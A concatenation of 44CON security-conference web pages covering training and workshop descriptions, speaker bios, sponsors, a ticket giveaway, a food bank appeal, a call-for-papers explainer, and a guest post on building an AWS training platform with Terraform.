          • Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required
          • Basic programming skills are a plus, but not essential

          What to Bring

          • At least 20GB of free disk space
          • At least 8GB of RAM
          • Students should have the latest Virtualbox installed on their machine
          • Full Admin access on your laptop

          About the Trainer

          Instructor – Leszek Miś (@cr0nym)

          Leszek Miś is the founder of Defensive Security and VP, Head of Cyber Security at Collective Sense, where he is responsible for strategy, business analysis, and technical product security research & feature recommendations. He has over 13 years of experience in the IT security market supporting the world’s largest customers in terms of exfiltration simulations and penetration tests, infrastructure hardening and general IT Security consultancy services. Next to that, he has 10 years of experience in teaching and transferring deep technical knowledge and his experience. He has trained 500+ students with an average evaluation of 4.9 on a 1-5 scale. He is an IT Security Architect with offensive love and a recognized expert in the enterprise Open Source Security solutions market. Leszek provides network data exfiltration simulation services, web application & infrastructure penetration tests and OSINT. He specializes in low-level Linux/OS hardening and defensive security of web application platforms (e.g. think about integration of WAF+BeEF!). He is also a known and respected trainer/examiner of Red Hat solutions and author of many IT Security workshops.

          Recent conference presentations include:

          • FloCon 2018 – May the data stay with U!
          • Confidence 2016 – Honey(pot) flavored hunt for cyber enemy
          • PLNOG 2016 – Yoyo! It’s us, packets! Catch us if you can

          Leszek holds security qualifications, certifications and memberships including Offensive Security Certified Professional (OSCP), Red Hat Certified Architect (RHCA), Red Hat Certified Security Specialist (RHCSS), Splunk Certified Architect and CompTIA Security+.

          Book your 44CON 2019 training course now!


          #####EOF##### Win CRESTCon 2019 Tickets! – 44CON

          Win CRESTCon 2019 Tickets!

          We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

          CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

          To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

          Some of the talks we’re most looking forward to at this year’s CRESTCon include:

          • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
          • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
          • Martin Jordan – Austerbury: Iranian cyber threat briefing

          Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!

          #####EOF##### 44CON 2018 Speakers – 44CON

          44CON 2018 Speakers

          Philippe Arteau

          Philippe is a security researcher working for GoSecure. His research is focused on Web application security. His past work experience includes pentesting, secure code review and software development. He is the author of the widely-used Java static analysis tool Find Security Bugs. He is also a contributor to the static analysis tool for .NET called Security Code Scan. He built many plugins for Burp and ZAP proxy tools: Retire.js, Reissue Request Scripter, CSP Auditor and many others. He presented at several conferences including Black Hat Arsenal, ATLSecCon, NorthSec, Hackfest (QC) and JavaOne.

          Twitter: h3xstream

          Guy Barnhart-Magen

          Guy is a member of the BSidesTLV organizing team and recipient of the Cisco “black belt” security ninja honor – the highest cyber security advocate rank.
          With over 15 years of experience in the cyber-security industry, he has held various positions in both corporates and start-ups.
          He is currently a security research manager at Intel, where he focuses on AI Security, reverse engineering and researching various embedded systems.

          Ezra Caltum

          Ezra is a cyber-security practitioner, with a passion for reverse engineering, data analysis, and exploitation. He is the leader of the Tel Aviv DC9723 Defcon group and a co-founder and organizer of BSidesTLV. Currently, he works as a Security Research Manager at Intel.

          James Forshaw

          James is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he’s been listed as the #1 researcher for MSRC, as well as being a Pwn2Own and Microsoft Mitigation Bypass bounty winner. He has spoken at a number of security conferences including Black Hat USA, CanSecWest, Bluehat, HITB, and Infiltrate. He’s also the author of the book “Attacking Network Protocols” available from NoStarch Press.

          Twitter: @tiraniddo
          Website: tyranidslair.blogspot.co.uk

          Leigh-Anne Galloway

          Leigh-Anne Galloway is a Security Researcher who specializes in the areas of application and payment security. Leigh-Anne started her career in incident response, leading investigations into payment card data breaches, which is where she discovered her passion for security advisory and payment technologies. She has presented and authored research on ATM security, application security and payment technology vulnerabilities and has previously spoken at DevSecCon, BSides, Hacktivity, 8dot8, OWASP, Troopers and Black Hat.

          Michael Gianarakis

          Michael Gianarakis is the co-founder and CEO of Assetnote, a platform for continuous monitoring of your external attack surface. Michael has presented at various industry events and meetups including DEF CON, Black Hat Asia, Thotcon, Rootcon and Hack in the Box. Michael is also actively involved in the local security community in Australia where he is one of the organizers of the monthly SecTalks meetup as well as the hacker camp TuskCon.

          Rancho Han

          Rancho Han is a senior security researcher at Tencent Zhanlu Lab (@ZhanluLab). He has more than seven years of information security experience. In the past, his work involved malware detection, exploit mitigations, and bug hunting. Recently, he has focused on research into Windows kernel fuzzing and exploit techniques.
          He participated in Pwn2Own 2017 (as Tencent Security Lance Team) and exploited Microsoft Edge with SYSTEM privilege in less than 1 second. He has also been a speaker at HITB 2018 (Amsterdam) and Hitcon 2016 (Taipei).

          Jahmel Harris

          Jahmel (Jay) is a security researcher and hacker. He co-founded Digital Interruption last year, a security consultancy which helps secure organisations with a mix of penetration testing and helping to embed security into application development pipelines. With a background in not only security testing but software development, Jahmel is able to advise engineers on balancing security with functionality.
          Jahmel has a particular interest in mobile application security, reverse engineering and radio and has presented talks and workshops at home in the UK and abroad. He also runs Manchester Grey Hats – a group aiming to bring hackers together to share knowledge and skills.

          Twitter: @jayHarris_Sec

          Pete Herzog

          Pete Herzog is the shining example of a hacker trying to fix the world. He built a career out of taking apart the security world piece by piece to figure out how it works (but he still can’t put it back together). Then he writes about it, a lot. You can find articles and projects from him all over the place, especially at the non-profit research organization The Institute for Security and Open Methodologies (ISECOM), which he co-founded in 2001 to help make this happen. There you’ll find his work with the Open Source Security Testing Methodology Manual (OSSTMM), Hacker Highschool, and the Cybersecurity Playbook as well as work in trust metrics, authentication, social engineering, vulnerabilities, risk analysis, and so much more. Pete also teaches training classes, coaches corporations on cybersecurity, analyzes the security for Smart Cities, develops security products, advises start-ups, and hacks things.

          Twitter: @peteherzog

          Timo Hirvonen

          Timo has been with F-Secure since 2010. While working in Labs, Timo kept the good guys safe by studying the latest tricks the bad guys used. He specialized in exploit analysis. Timo joined Cyber Security Services in 2016, and nowadays he enjoys protecting enterprises by working on various types of assessments, including incident response and red team exercises. Timo has presented at INFILTRATE 2018, Black Hat USA 2014, Microsoft Digital Crimes Consortium 2014, CARO 2013, Scandinavian Cybercrime Conference 2013, and t2 infosec conference.

          Thibault Koechlin

          After a few years of pentesting and offensive R&D, I turned to defense for new challenges. As a convalescent CSO, I am focusing on defensive R&D with a strong focus on web & FOSS.

           

           

          Matt Lorentzen

          Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements.
          Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.

          Twitter: @lorentzenman

          Jack Matheson

          Jack is a principal engineer at Mellanox Technologies, where he develops software to make networks and data centers more secure. For 15 years, he has been building software/hardware hybrid solutions to accelerate and secure workloads – most recently at McAfee, where he was the chief cloud architect for enterprise security, and Intel, as the software architect for cloud identity.

          Carl Morris

          Carl has over 20 years’ experience working within IT, over a decade of which was in a global corporate environment, starting out in entry level support and working up to System Administration covering the whole breadth of the IT infrastructure, including Active Directory, Exchange, System & Patch Management, but with a primary focus and interest on security related solutions such as firewalls, endpoint security, NAC and general system security. This has been followed by around a decade working in MSSPs, the latest of which is SecureData, for over 6 years: initially as an Escalation Engineer, followed by moving into Professional Services and subsequently to the Managed Threat Detection team as a Senior Security Analyst, where he is now the lead analyst for the Managed Threat Hunting service. Aside from day to day activities, the past few months have been spent developing and implementing endpoint capabilities through the use of Sysmon & WEF, as well as building detection rules and analytics around that to aid in hunting exercises.

          Twitter Handle: @camorris74

          Willem Mouton

          Willem is the head of SensePost SecureData Labs – the group’s R&D division. Willem is an industry veteran with decades of experience in product development, pentesting, managed services, OSInt and Reconnaissance, security research and most recently Threat Detection and Threat Hunting. He is also an experienced speaker and trainer with exposure at top international forums like Black Hat.

          Twitter handle: @_w_m__

          Lawrence Munro

          Lawrence Munro is the Worldwide VP of SpiderLabs, a Post-Graduate Student at Oxford University and a member of the CREST Executive. He regularly presents at conferences on a range of topics, but normally: red teaming, education in Infosec or weird side-projects. Lawrence also owns Hackarmoury.com and blogs at Pentesticles.com

          Twitter handle: @munrobotic

          Chen Nan

          Chen Nan is a Security Researcher at ZhanLu Lab, Tencent. Currently he is focusing on security research about the DXG module in the Windows kernel. Previously, he discovered 10+ vulnerabilities in a short period of time. Some of them can be used for Edge sandbox escape.

           

          Enrique Nissim

          Enrique Nissim is a Senior Security Consultant at IOActive. His experience and interests include reverse engineering, exploit development, programming and application security. He has also been a regular speaker at other international cybersecurity conferences, including CansecWest, EKOParty, ZeroNights, and AsiaSecWest.

          Twitter: @kiqueNissim

          David Rogers

          David is a mobile phone and IoT security expert, founder and CEO of Copper Horse Solutions Ltd, a software and security company based in Windsor, UK. His company is currently focusing on security and privacy research for the Internet of Things, including connected car security.

          David chairs the Device Security Group at the GSM Association and sits on the Executive Board of the Internet of Things Security Foundation. He is a Visiting Professor in Cyber Security and Digital Forensics at York St John University and teaches Mobile Systems Security at the University of Oxford.

          He has worked in the mobile industry for 20 years in security and engineering roles. Prior to this he worked in the semiconductor industry. His book ‘Mobile Security: A Guide for Users’ was published in 2013. Most recently he authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues.

          Twitter: @drogersuk

          Gabriel Ryan

          Gabriel Ryan is a penetration tester and researcher with a passion for wireless and infrastructure testing. He currently serves as a co-founder and principal security consultant for Digital Silence, a Denver based consulting firm that specializes in impact driven penetration testing and red team engagements.

          Prior to joining Digital Silence, Gabriel worked as a penetration tester and researcher for Gotham Digital Silence, contributing heavily to their wireless security practice and regularly performing large scale infrastructure assessments and red teams for Fortune 500 companies. Some of Gabriel’s most recent work includes the development of EAPHammer, an 802.11ac focused tool for breaching WPA2-EAP networks. On the side, he serves as a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys producing music, exploring the outdoors, and riding motorcycles.

          Twitter: @s0lst1c3

          Saumil Shah

          Saumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognised speaker and instructor, having regularly presented at conferences like Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

          Twitter: @therealsaumil

          Shubham Shah

          Shubham Shah is the co-founder and CTO of Assetnote, a platform for continuous monitoring of your external attack surface. Shubham is a prolific bug bounty hunter in the top 50 hackers on HackerOne and has presented at various industry events including QCon London, Kiwicon, BSides Canberra and WAHCKon. Shubham is also a founder of the charity Hackers Helping Hackers which provides hackers from under-represented and less privileged groups access to industry events, mentorship and training.

          Kevin Sheldrake

          Kevin Sheldrake is a penetration tester and researcher who started working in the technical security field in 1997. Over the years, Kev has been a developer and systems administrator of ‘secure’ systems, an infosec policy consultant, a penetration tester, a reverse engineer and an entrepreneur who founded and ran his own security consulting company. His current interests are tool development for better penetration testing, and he has specialised in IoT and crypto for a number of years.

          He has a Masters degree, is a Chartered Engineer and, in the past, has been a CHECK Team Leader, a CISSP and held CLAS.

          Kev has presented at 44con, Troopers, DEFCON 4420, 441452 and 441392 on RFID crypto (Cracking HiTag2 Crypto); EMF Camp, DEFCON 4420 and 441452 on hacking embedded devices (Inside our Toys); presented on building debuggers for embedded devices at Securi-Tay (Phun with Ptrace()); and also presented a lengthy take down on the use of NLP in Social Engineering at DEFCON 4420 (Social Engineering LIES!). He has also presented regularly at his employer’s internal security conference, winning best talk in 2014 for ‘Embedded Nonsense’, a talk about hacking an IoT device and reversing its crypto, which he subsequently presented at Cyber Security Challenge.

          Twitter: @kevsheldrake
          Website: rtfc.org.uk

          Klaus Schmeh

          Klaus Schmeh is the world’s leading blogger in the field of crypto history. Klaus’ blog has become the most important online forum for unsolved encryptions and historical ciphers. Even the NSA has forwarded to him inquiries concerning encrypted documents.

          Klaus’ blog readers have proved extremely successful in breaking old cryptograms.

          Klaus Schmeh has published 14 books, 200 articles, 700 blog posts and 20 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most of his other publications are in German.

          In his main profession as a security consultant at the German company cryptovision, Klaus utilizes his special skill in explaining complex technical topics, often using self-drawn cartoons and Lego brick models for visualization.

          Tim Todd

          From a background in Reverse Engineering and Algorithm Design, Tim’s past life as a developer had him working on projects as diverse as BIOS & BIST code for Critical Systems through to designing efficient algorithms for Network Load Distribution.

          As a hobbyist, Tim’s passion is modifying embedded firmware; whether it’s his A/V equipment, his phone, or his games console, few things in his house run their original firmware.

          A few years ago Tim ‘jumped the fence’, and currently works as an Embedded Pentester. He is a regular presenter at internal conferences, with talks on Bare-metal R.E., Cryptography, Device Design, and Car Networks.

          If none of that appeals… 1) Why are you here? …2) Come and chat about magic and mentalism; guitars, keyboards, & chord theory; or the more interesting bits of NLP, hypnotism and social engineering.

          Tomi Tuominen

          Tomi is known as the “InfoSec Swiss Army Knife” because when it comes to defending computers, he’s done a little bit of everything. In his more than two decades in the industry, he has taken part in breakthrough research on Windows networking, physical access control systems and electronic voting.
          As F-Secure’s Head of Technical Security Consulting, he specializes in protecting enterprises – often by breaking into them before anyone else can. The founder of the t2 infosec conference, Tomi has thrice been named one of the Top 100 IT Influencers in Finland.

          Chris Wade

          Chris is a seasoned security researcher and testing consultant. He’s usually got at least one project on the go, for example reverse engineering hardware, firmware and RF, or fingerprinting USB vulnerabilities with his own fuzzing framework. Another really good example is using Software Defined Radio, with his modded RTL-SDR dongle to sniff radio signals, mainly looking at NFC protocols.

          He also has experience of analysing x86 executables to break protections such as license key requirements, and also for crafting exploits for general buffer overflow vulnerabilities, though this is definitely not as strong as his work analysing the ARM architecture. He’s also pretty good on the guitar.

          Charl van der Walt

          I’m a founder of SensePost – a pentesting company in South Africa and the UK – where I still form part of the management. Over almost 20 years at SensePost I acted in various roles including CEO for about 5 years. After we sold SensePost to a UK business called SecureData I took a diverse role with the group that includes leading its research unit, directing security strategy and also leading the ‘Security Intelligence Unit’, which amongst other things runs a significant Managed SIEM and Threat Hunting (MDR) Operation.

          I have spoken on a variety of occasions over the duration of my career, including at Black Hat, HITB, Defcon, NATO CCDCOE, BSides and others (but never at 44CON).

          I used to have a dog called Fish, but she died. Now I have a dog called Rabbit with three legs.

          Twitter: @charlvdwalt

          Julien Voisin

          Julien (jvoisin) Voisin used to pwn and reverse stuff while contributing to radare2. Nowadays he focuses on protecting web applications while keeping his own bug alive on websec.fr and writing things on dustri.org. He’s also running some high-speed Tor relays.

          Tim Yunusov

          Tim Yunusov is a Security Expert in the area of banking security and application security. He has authored multiple pieces of research in the field of application security, which include “Apple Pay replay attacks” (Black Hat USA 2017), “7 sins of ATM protection against logical attacks” (PacSec, POC), “Bruteforce of PHPSESSID”, “XML Out-Of-Band” (BlackHat EU), and is rated in the Top Ten Web Hacking Techniques by WhiteHat Security. He regularly speaks at conferences and has previously spoken at CanSecWest, Black Hat USA, Black Hat EU, HackInTheBox, Nullcon, NoSuchCon, Hack In Paris, ZeroNights and Positive Hack Days.

          Jie Zeng

          I am a senior security researcher from Zhanlu Lab of Tencent. I have many years of security research experience, focusing on bug hunting and exploit technology about Adobe Flash and various browsers.

          In the past few years I have found 30+ vulnerabilities in Adobe Flash Player and got 20 CVE numbers (some of them have won the Chrome reward program’s bounty). I am also the winner of the Microsoft Edge project in Pwn2Own 2017 (the Team Lance).

          Twitter: @hi_tedJoy

           

           

           

           

           

          #####EOF##### 44CON 2016 Workshops – 44CON

          44CON 2016 Workshops

          Thank you to all of our awesome Speakers this year! Grab your ticket in our shop so you don’t miss out on attending these great workshops.

          ARM Shellcode Basics

          Presented By: Saumil Shah

          A 2 hour workshop on writing ARM Shellcode from scratch. The workshop will cover some simple ARM assembly, and hands-on work with two shellcode examples: a simple execve() shell and a fully working Reverse Shell. This will then be tested with two ARM exploits.

          Attendees are required to bring in their laptops with a working copy of VMWare (Player/Workstation/Fusion). ARM images running on QEMU will be distributed to the participants.

          Advanced Java Application Code Review

          Presented By: Philippe Arteau

          Modern corporate environments use diverse technologies. Security analysts (code reviewers and pentesters) need to be able to understand how components work under the hood. This workshop will cover various classes of vulnerabilities with a Java twist. The exercise will be on the code analysis of a custom sample application. The open-source tools Find Security Bugs and SonarQube will be used. This training will cover the following classes of vulnerabilities: XXE (XML eXternal Entity), expression injection, deserialization vulnerability, Path Traversal, HQL injections and XSS.

          Hunting Linux Malware for Fun and $flags

          Presented By: Olivier Bilodeau & Marc-Etienne M.Léveillé

          Server-side Linux malware is a real threat now. Unfortunately, as for its Windows counterpart, most system administrators are inadequately trained or don’t have enough time allocated by their management to analyse and understand the threats that their infrastructures are facing. This tutorial aims at creating an environment where Linux professionals have the opportunity to study such threats safely and in a time-effective fashion.

          In this introductory tutorial you will learn to fight real-world Linux malware that targets server environments. Attendees will have to find malicious processes and concealed backdoors in a compromised Web server.

          In order to make the tutorial accessible for a range of skill levels several examples of malware will be used with increasing layers of complexity — from scripts to ELF binaries with varying degrees of obfuscation. Additionally, as is common in Capture-The-Flag information security competitions, flags will be hidden throughout the environment for attendees to find.

          Requirements:

          • Good understanding of Linux server systems (userland)
          • Laptop with a Linux native system or a Linux virtual machine
          • Pre-installed tools: text-editor, OpenVPN client, gdb
          • Optional: ipython, IDA Pro (proprietary)

          Skills to acquire:

          • Live system incident response and forensics using Linux’s standard tools
          • System hardening
          • Introduction to reverse-engineering obfuscated scripts and binaries

          Managing Incidents with CyberCPR

          Presented By: Steve Armstrong 

          CyberCPR provides a secure environment for incident responders to discuss incidents, exchange files, review incident progress, provide automated analysis of evidence items and a range of other time-saving features based on practical experience.

          This will be a hands on workshop, with students participating actively, accessing the demo CyberCPR system, creating incidents and adding evidence. In the workshop we will show the various aspects of the tool and how to get the most from it.

          During this workshop we will explain the background security of the system, the integrity monitoring of the database, the file encryption of all evidence in the file vault and how sensitive incidents (unauthorized internal data access or child pornography) can be processed on the same system.

          At the end of the workshop the attendees will have a good understanding of the capability of CyberCPR and how to operate its key features. They will leave with a VM of the CyberCPR ready to run on a laptop of their choosing.

          #####EOF##### Previous Speakers – 44CON

          Previous Speakers

          Our CFP for 44CON 2016 is now closed and the speakers have been selected.

          If you want to speak at one of our events, please check this site regularly, follow us on twitter or subscribe to our mailing-list for announcements and updates regarding our CFP.

          Speakers who have presented at 44CON, 44CON LONDON and 44CON CYBER SECURITY:

          A big thank you to all of them!

          #####EOF##### 44CON Sponsors – 44CON

          44CON Sponsors

          If you would like to sponsor 44CON 2019, our 44CON 2019 Sponsor Pack provides all the information you will need about sponsoring the conference. If you have any questions, please email Sponsor Ops who will be happy to help.

          Last year’s sponsors, at 44CON 2018.

           

          Gold Sponsors

          BT

          www.bt.com

          HackerOne

          www.hackerone.com

          Tenable

          www.tenable.com

          Silver Sponsors

          Microsoft

          www.microsoft.com

           

          Crowdfense

          www.crowdfense.com

           

          Exhibitors

          Bugcrowd

          www.bugcrowd.com

          Botprobe

          botprobe.co.uk

          Google


          google.com

          Tigerscheme

          www.tigerscheme.org

          Twitter: @tiger_scheme

          CheckSec

          www.checksec.com

          SuperAwesome

          www.superawesome.tv

          safepass.me

          safepass.me

          Cortex Insight

          cortexinsight.com

          Event Supporters

          Integrity

          www.integrity.pt

          Community Sponsors

          CREST

          www.crest-approved.org

          ISSA-UK


          www.issa.org

          RawHex

          rawhex.com

          OWASP

          www.owasp.org

          Event Partners
          #####EOF##### 44CON Training | Sense/Net

          Tickets for 44CON Training

          Please visit 44CON Training pages for more information.

          Follow us on twitter and subscribe to our newsletter for announcements and be first informed when tickets are up for sale.








          #####EOF##### Building a cloud security training platform – Pt 2: Infrastructure As Code – 44CON

          Building a cloud security training platform – Pt 2: Infrastructure As Code

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and DevSecOps training course this June. He also has a blog where he talks about AWS, Cloud Security and DevSecOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Part 1 is available here. Thanks, Paul!

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own. As I described in my last blog post I also decided to build a training platform, so that students can connect to a virtual desktop in the cloud with all the software they need pre-installed.

          That way they can come on to the course with any laptop or even tablet which supports the Amazon WorkSpaces client.

          The next step after the proof of concept and design was to build it using as much automation as possible – to keep cost low, I wanted to easily destroy everything as soon as a course finished, and to rebuild just before starting the next one.

          I’m also taking the opportunity to demonstrate good security practice, and I’ll use the training environment as an example to show students during the course.

          An important security principle is segregation, so I decided to build the training environment in its own AWS account. But I didn’t want to have yet another monthly bill. So I used AWS Organizations to create the new account:

          That way, billing for all my AWS accounts is consolidated, and I can also use Service Control Policies to enforce security policies on the new account.

          The next step was to create the AWS Directory Service – this is an AWS managed Active Directory which I’ll use to manage user identities, for students to log on to their Amazon WorkSpaces virtual machines. I decided to use Terraform by HashiCorp, as it’s ideal for automating infrastructure as code:

          Here’s an example of the code snippet used to create the AWS Directory service:

          My Terraform code included nearly all the required resources:

          • VPC, DMZ and private subnets in multiple availability zones, subnet routes
          • Network Address Translation (NAT) gateways and Internet gateway
          • Key and key alias in AWS Key Management Service
          • Virtual machine instance for Active Directory admin, security group and Elastic IP
          • Amazon Route 53 domain name for AD Admin virtual machine Elastic IP
          • Identity and Access Management (IAM) policy and role for AD admin virtual machine
          • AWS Systems Manager templates for domain join and Windows feature setup
          • Secrets in AWS Secrets Manager for user passwords – more on this later

          The one exception is Amazon WorkSpaces, as these are not supported by Terraform at the time of writing.
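
          As an added illustration (not the author's code), here is how the directory, the KMS key and alias, and a Secrets Manager entry from the list above could be declared together in Terraform 0.12+ syntax with the AWS and random providers. The domain name, resource names, variables, the Microsoft AD directory type and the choice to store the directory admin password as a secret are all assumptions.

```hcl
# Added example, not the author's code. All names and values are placeholders.

variable "vpc_id" {
  description = "ID of the training VPC (assumed to be defined elsewhere)"
  type        = string
}

variable "private_subnet_ids" {
  description = "Two private subnets in different availability zones"
  type        = list(string)
}

# Customer-managed key for encrypting the platform's secrets
resource "aws_kms_key" "training" {
  description             = "Training platform secrets"
  enable_key_rotation     = true
  deletion_window_in_days = 7
}

resource "aws_kms_alias" "training" {
  name          = "alias/training-platform"
  target_key_id = aws_kms_key.training.key_id
}

# Generate the directory admin password rather than hard-coding it
# in the configuration or a tfvars file.
resource "random_password" "directory_admin" {
  length      = 32
  special     = true
  min_lower   = 1
  min_upper   = 1
  min_numeric = 1
  min_special = 1
}

resource "aws_secretsmanager_secret" "directory_admin" {
  name       = "training/directory-admin"
  kms_key_id = aws_kms_key.training.arn

  # Delete immediately on destroy: with a recovery window the name stays
  # reserved, and the rebuild before the next course would fail.
  recovery_window_in_days = 0
}

resource "aws_secretsmanager_secret_version" "directory_admin" {
  secret_id     = aws_secretsmanager_secret.directory_admin.id
  secret_string = random_password.directory_admin.result
}

# AWS managed Active Directory in the private subnets
resource "aws_directory_service_directory" "training" {
  name       = "training.example.com" # placeholder domain
  short_name = "TRAINING"
  type       = "MicrosoftAD" # assumption: the page only says "managed Active Directory"
  edition    = "Standard"
  password   = random_password.directory_admin.result

  vpc_settings {
    vpc_id     = var.vpc_id
    subnet_ids = var.private_subnet_ids
  }
}

# DNS addresses the admin instance needs in order to join the domain
output "directory_dns_ips" {
  value = aws_directory_service_directory.training.dns_ip_addresses
}
```

          The generated password is also written to the Terraform state in plaintext, so the state file needs the same protection as the secret itself: an encrypted remote backend with tightly restricted access.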

          I typed “terraform apply” and about 30 minutes later the infrastructure was built in the new AWS account, and I could see all the resources in the portal. Here’s the AWS Directory service built from the code snippet above:

          After some troubleshooting, I succeeded in automating the domain join of the AD Admin Windows Server 2016 virtual machine, using an AWS Systems Manager document template. I also created some automation templates to set up the Windows feature for Active Directory administration tools, and to install the AWS PowerShell Module, so I could use these later.

          Then, I logged in to the AD admin virtual machine using Microsoft Remote Desktop with my domain admin credentials:

          Opening Active Directory Users and Computers, I could see the AWS Directory domain.

          All I needed now were some automation scripts to create users, and then build the Amazon WorkSpaces. I’ll cover these in my next post.

          #####EOF##### Matt Lorentzen – 44CON

          Matt Lorentzen

           

          Twitter: @lorentzenman
          Matt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements.
          Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.

          Matt will present at:

          #####EOF##### hackingforfoodbanks – 44CON

          Making Britain a Better Place For The Most Vulnerable

          “You measure the degree of civilization of a society by how it treats its weakest members.”

          This quote has been attributed in various forms to historical figures from Pope John Paul to Dostoevsky, Churchill and even Gandhi. It is a commonly held British value that we should treat others how we’d wish to be treated.

          The UK’s food poverty crisis has been getting worse for the best part of a decade. From austerity to universal credit, by that quote above our society’s score is dropping like a stone. This year we’ve come together to support the Trussell Trust and Hammersmith & Fulham Foodbank. It’s an initiative we’re calling Hacking For Foodbanks, that will continue beyond 44CON. While it’s been founded by 44CON crew, we want it to be bigger and separate to 44CON. Food poverty is a national problem and we need your help to help those that need it the most. Hacking For Foodbanks has a 4-point plan to make an impact on UK food poverty through cybersecurity and the tech industry, which you can read more about here.

          Help us raise money at 44CON

          We want you to bring your (working) retro, old and cool tech that you’re willing to part with as part of a bring and buy sale operated by Hammersmith & Fulham Foodbank and the Trussell Trust. We’ll provide tags so you can set a suggested price for your donated goods, and people can come along to the Trussell Trust table and put in an offer. Got a reasonable-sized retro-battlestation like a Rubber keyed spectrum? Fantastic! WPA injection wifi cards and Hayes serial modems? Super! We’re ideally looking for bric a brac others would want to buy at £5-£50 in suggested value.

          Anything that doesn’t get sold can be picked up by the people that dropped it off, or alternatively we’ll donate the kit to similar activities at other UK events.

          We’re also offering people the opportunity to make a donation to the initiative both at the event and when they buy a ticket, or register for the free open evening.

          All funds raised will be split 50/50 between Hammersmith & Fulham Foodbank and the Trussell Trust, in order to support foodbank activity in Fulham and across the UK.

          Get involved

          We’re also looking for people to take part in our mentoring scheme, to be piloted in early 2019. In particular we want people from non-technical as well as technical fields, particularly where a university degree isn’t required. We want to raise awareness for foodbank users that there are career opportunities out there, from sales and recruiting to technical jobs. We want to bring these opportunities to interested and able foodbank users and help them when they need a hand the most. Most important of all, we want to eliminate UK food poverty, one family at a time. If you’d like to help, wherever you are just drop us an email.


          #####EOF##### news – 44CON

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

